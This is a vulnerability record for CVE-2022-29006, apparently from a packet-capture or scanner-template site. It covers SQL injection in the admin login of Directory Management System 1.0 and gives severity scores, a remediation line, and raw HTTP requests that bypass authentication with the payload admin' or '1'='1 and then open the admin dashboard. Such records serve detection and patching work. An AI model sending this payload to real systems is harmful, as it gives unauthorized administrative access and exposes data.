| Title | Directory Management System 1.0 - SQL Injection |
|---|---|
| Author | TenBird |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0. |
| CVSS Score | 9.8 |
| EPSS Score | 0.85946 |
| CVE ID | CVE-2022-29006 |
| CWE ID | CWE-89 |
| Tags | cve2022 cve sqli auth-bypass edb phpgurukul vuln |
Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
POST /admin/index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13
Connection: close
Content-Length: 48
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
username=admin' or '1'='1&password=1&login=login
GET /admin/dashboard.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29006.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-29006.pcap
N/AN/A